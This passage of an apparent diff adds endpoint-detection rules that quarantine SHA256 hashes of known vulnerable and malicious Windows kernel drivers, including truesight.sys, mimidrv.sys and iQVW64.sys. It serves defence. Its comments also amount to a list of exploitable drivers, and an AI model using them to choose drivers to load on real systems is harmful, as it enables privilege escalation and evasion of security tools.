"hl_testing_start_time": "2026-03-23T11:45:29.973155Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "86236392bb2cc77100bd83d34a30e3fb60aa727d0b11c147a838d9a205bae80e", + "comment": "Elaborate Bytes vulnerable driver (aka ElbyCDIO.sys) [CVE-2009-0824] [https://www.loldrivers.io/drivers/855ade1f-8a9e-4c9d-ab8e-d7e409609852/] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "0fd85c56-ccfe-5ebd-bbdd-e4c1623b4f29", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.466043Z", + "creation_date": "2026-03-23T11:45:30.466046Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.466054Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "0f7bfa10075bf5c193345866333d415509433dbfe5a7d45664b88d72216ff7c3", + "comment": "Malicious Kernel Driver (aka mimidrv.sys) [https://www.loldrivers.io/drivers/87752fb8-e9f6-4235-91e2-c4343677d817/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "0fdc589e-7f5c-5c77-8ad3-7b555320b40a", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + 
"rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.821826Z", + "creation_date": "2026-03-23T11:45:31.821829Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.821837Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "3b7c14dd71837e42450aafee5c7bb67d4badd203616f1b2e73591a154ac16ce6", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "0fe70913-7db9-5caf-aa16-093c73b405cb", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.977125Z", + "creation_date": "2026-03-23T11:45:29.977127Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.977134Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": 
"cf69704755ec2643dfd245ae1d4e15d77f306aeb1a576ffa159453de1a7345cb", + "comment": "ASUS vulnerable VGA Kernel Mode Driver (aka EIO.sys) [https://www.loldrivers.io/drivers/f654ad84-c61d-477c-a0b2-d153b927dfcc/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "0feaa0c1-2405-590d-856e-b953fff47696", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.156723Z", + "creation_date": "2026-03-23T11:45:31.156725Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.156731Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "e6ddce3ee843569abcdb06523dc5031394bcb971a645922eaeb85a462b72188c", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "0ff1da40-e272-5b75-a9f0-c560dfe8123a", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": 
"system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.609920Z", + "creation_date": "2026-03-23T11:45:29.609922Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.609927Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "1622ac0c618a86be17e0f97daa061f9aaa0e721dc0fd30d76bbc5c958e9a9d92", + "comment": "Novell vulnerable driver (aka nicm.sys, nscm.sys and ncpl.sys) [CVE-2013-3956] [https://www.loldrivers.io/drivers/f4126206-564f-49f5-a942-2138a3131e0e/] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "0ff21dd9-50d9-56fc-a27e-7854969d326c", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.493681Z", + "creation_date": "2026-03-23T11:45:31.493684Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.493692Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "fa50f18e1db46b6ddabd195f67745eb38dd0f68bea634ab8a64350d81e3d4734", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) 
[https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "0fffa5ff-208c-500e-b7b5-40d00c7cbcdc", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.813825Z", + "creation_date": "2026-03-23T11:45:31.813827Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.813833Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "c25dceb5b12dcb45cd96abcaac829fabd3078ba24b732efb31194af3b79dad8d", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "100325ea-73a3-5f97-be11-5609d3d465ac", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:32.145737Z", + "creation_date": 
"2026-03-23T11:45:32.145739Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:32.145745Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "668c5bead3c7fcd919afd742ede7e5fe07972dc4cf730ff37deabdd22d88de4a", + "comment": "Malicious Kernel Driver (aka driver_668c5bea.sys) [https://www.loldrivers.io/drivers/04eefdf4-448d-45bb-87fc-93f263fc77f4/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "10045882-2ed4-55fb-962a-6aee1926e65f", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.815097Z", + "creation_date": "2026-03-23T11:45:31.815100Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.815109Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "bba8e6906541aed6406438a7a27f4e3d8e603a325449b0cc17df53d1d0db8329", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "100abf05-0ca9-53bc-9994-30a704e0020a", + 
"test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.463299Z", + "creation_date": "2026-03-23T11:45:30.463302Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.463311Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "b0a27ac1a8173413de13860d2b2e34cb6bc4d1149f94b62d319042e11d8b004c", + "comment": "Malicious Kernel Driver (aka mimidrv.sys) [https://www.loldrivers.io/drivers/87752fb8-e9f6-4235-91e2-c4343677d817/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "10108155-f204-5434-ad7c-a0e750f86310", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.829483Z", + "creation_date": "2026-03-23T11:45:30.829485Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.829491Z", + "rule_level": null, + "rule_level_override": 
null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "d29c7bd3f007bde4776866ccf377eb222673009ac0280948fd704a525f6515ec", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "1017936e-446a-5fd9-b643-5290e67ca045", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.454269Z", + "creation_date": "2026-03-23T11:45:30.454273Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.454282Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "7462b7ae48ae9469474222d4df2f0c4f72cdef7f3a69a524d4fccc5ed0fd343f", + "comment": "Vulnerable Kernel Driver (aka kEvP64.sys) [https://www.loldrivers.io/drivers/fe2f68e1-e459-4802-9a9a-23bb3c2fd331/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "1022da3e-ab26-53be-ade5-83f022a87076", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": 
"af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.827822Z", + "creation_date": "2026-03-23T11:45:31.827824Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.827830Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "ada441e68a3291303ed191fc670a8e2521b8e83a7008ee789335a8a0d62af825", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "102df2d2-d0c4-5934-89e3-fe76d74cec09", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.621368Z", + "creation_date": "2026-03-23T11:45:29.621374Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.621379Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "191689c53195dbe828f406b206cb167dcd4671ecdab32b80e01c885f706a6baf", + "comment": 
"ASUSTeK vulnerable physmem driver (aka AsIO64.sys) [https://www.loldrivers.io/drivers/79692987-1dd0-41a0-a560-9a0441922e5a/] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "103c8f1f-9c70-5eaf-83ae-0a4dd214d667", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.830013Z", + "creation_date": "2026-03-23T11:45:31.830015Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.830021Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "7e256508f576243d58cf038eb0db38cb9573b4d5adedb35a07e0925ea4032623", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "103e5409-ed39-5f42-9b81-0a0f09b73c8a", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": 
"2026-03-23T11:45:30.481169Z", + "creation_date": "2026-03-23T11:45:30.481171Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.481176Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "eb91e05733244a23f741a299e5e4a57836685a8f45366e690bc30b4befc02b14", + "comment": "Vulnerable Kernel Driver (aka TdkLib64.sys) [https://blogs.vmware.com/security/2023/10/hunting-vulnerable-kernel-drivers.html] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "104e8a15-8afb-5a2d-a85e-cf64aa59bcac", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.820698Z", + "creation_date": "2026-03-23T11:45:31.820701Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.820710Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "1402f071112c6f5c5fd4dd1aa31f03ad56b5e771c4de1fb54be75096cd3c2b40", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" 
+} +{ + "id": "1066e54f-9e28-5c3d-bb31-61f4d2e169c4", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.140970Z", + "creation_date": "2026-03-23T11:45:31.140972Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.140978Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "f8494ecde84bbed336833d05e100e17873f3eab95f4dc676274cf072e6d758f3", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "10731df9-0b81-51f4-99f7-34199a58c987", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.982140Z", + "creation_date": "2026-03-23T11:45:29.982142Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": 
"stable", + "hl_testing_start_time": "2026-03-23T11:45:29.982147Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "d969845ef6acc8e5d3421a7ce7e244f419989710871313b04148f9b322751e5d", + "comment": "Vulnerable Kernel Driver (aka rwdrv.sys) [https://www.loldrivers.io/drivers/b03798af-d25a-400b-9236-4643a802846f/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "10758e24-d69a-5e75-86ab-812ae70129e7", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.972284Z", + "creation_date": "2026-03-23T11:45:29.972286Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.972291Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "0ae3c446e5f075e8fc3db31eabd744a65b2c50a9b4a52877873547951bc19bc9", + "comment": "Intel Ethernet diagnostics vulnerable driver (aka iQVW64.sys) [CVE-2015-2291] [https://www.loldrivers.io/drivers/1d2cdef1-de44-4849-80e5-e2fa288df681/] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "107dea3e-fe98-5414-bb9b-b95be19fb94d", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + 
"rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.498469Z", + "creation_date": "2026-03-23T11:45:31.498472Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.498480Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "8a1c37bda3fc4ad8a5ccd3c5e0af179314a43b7294180ecc0fbedefa96701c59", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "1084ffbf-3e2b-52b6-9946-0aa18d1f6f1c", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.157049Z", + "creation_date": "2026-03-23T11:45:31.157051Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.157057Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": 
"hash", + "value": "0f2cdadbbf1072dcba6ef07bf3ef3a9e24a77b9401970a5cc4fa5bbe77c315f5", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "1087ce96-0757-5619-a841-810173fed890", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.621755Z", + "creation_date": "2026-03-23T11:45:29.621757Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.621764Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "9c7ad854f6670452d7da064d4b429eb90c42155b6f7eaa52ee471d9ee8b61e6f", + "comment": "ASUSTeK GPU vulnerable physmem driver (aka AsIO2_64.sys) [https://syscall.eu/blog/2020/03/30/asus_gio/] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "108a7c91-008b-5f1b-9462-a7c65103d067", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": 
"system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.808649Z", + "creation_date": "2026-03-23T11:45:31.808651Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.808657Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "c78e4e21776fb14f43641e98a50624497de8039dc22b9514755e3e681a34d4ff", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "10955731-1fa3-507e-8f4a-1ffe5d6743c0", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + 